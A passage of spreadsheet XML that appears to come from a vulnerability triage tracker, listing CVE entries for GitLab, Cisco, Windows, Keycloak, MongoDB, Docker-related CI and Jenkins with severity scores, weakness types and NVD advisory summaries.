    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78252</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr"/>
      <c r="Q86" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.3 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that, under certain conditions, an authenticated user could have induced a targeted user to perform unintended state-changing HTTP requests due to improper sanitization of user-controlled data in the Markdown JSON table renderer.</t>
        </is>
      </c>
      <c r="S86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78252</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20335</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr"/>
      <c r="Q87" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20335 are related to incorrect calculation issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-682.</t>
        </is>
      </c>
      <c r="S87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20335</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69813</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr"/>
      <c r="Q88" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69858</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr"/>
      <c r="Q89" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69989</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K90" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr"/>
      <c r="Q90" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70342</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K91"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91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr"/>
      <c r="Q91" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70563</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K92"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92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr"/>
      <c r="Q92" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74909</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr"/>
      <c r="Q93" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>Keycloak provides a policy enforcer to protect applications by matching incoming web requests against defined security policies. A flaw was found where the enforcer fails to correctly normalize web addresses that contain special encoded characters, such as those representing semicolons or directory traversal segments. An authenticated user can use these encoded characters to trick the enforcer into applying a less restrictive security policy than intended, potentially gaining unauthorized access to sensitive administrative or private application endpoints.</t>
        </is>
      </c>
      <c r="S93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74909</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78450</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K94" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr"/>
      <c r="Q94" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82066</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K95" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr"/>
      <c r="Q95" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds read security issue exists in the query planning component of MongoDB Server. An authenticated user with database read and write privileges can trigger the security issue through crafted query operations, causing the server to read memory beyond allocated buffer boundaries. The revealed memory contents may be partially observable through diagnostic query statistics output.</t>
        </is>
      </c>
      <c r="S95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69423</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K96"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96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr"/>
      <c r="Q96" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69503</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K97" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr"/>
      <c r="Q97" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85469</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr"/>
      <c r="Q98" s="5" t="inlineStr">
        <is>
          <t>CWE-1357</t>
        </is>
      </c>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in quay-builder-qemu. A remote attacker could exploit this by compromising the upstream `Noelware/docker-manifest-action` used in the release workflow, which is pinned to a mutable branch. This allows the attacker to inject arbitrary code, leading to the exfiltration of sensitive registry credentials or the publication of malicious images. The workflow also exposes the default GitHub token, increasing the severity of the compromise.</t>
        </is>
      </c>
      <c r="S98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85469</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92127</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr"/>
      <c r="Q99" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier automatically approves the classpath entries in an item configuration when a user with Overall/Administer permission copies the item, or updates that configuration through the REST API or CLI, allowing attackers able to define classpath entries to execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92127</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92134</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr"/>
      <c r="Q100" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>Jenkins Warnings Plugin 13.10258.va_17d49a_78c3b_ and earlier does not validate the analysis results ID when a job configuration is submitted through the REST API, allowing attackers with Item/Configure permission to use a javascript: scheme URL as identifier, resulting in a stored cross-site scripting (XSS) vulnerability.</t>
        </is>
      </c>
      <c r="S100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92134</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92135</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr"/>
      <c r="Q101" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>Jenkins Coverage Plugin 3.3358.v9487dde48783 and earlier does not validate the coverage results ID when a job configuration is submitted through the REST API, allowing attackers with Item/Configure permission to use a javascript: scheme URL as identifier, resulting in a stored cross-site scripting (XSS) vulnerability.</t>
        </is>
      </c>
      <c r="S101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92135</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92136</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr"/>
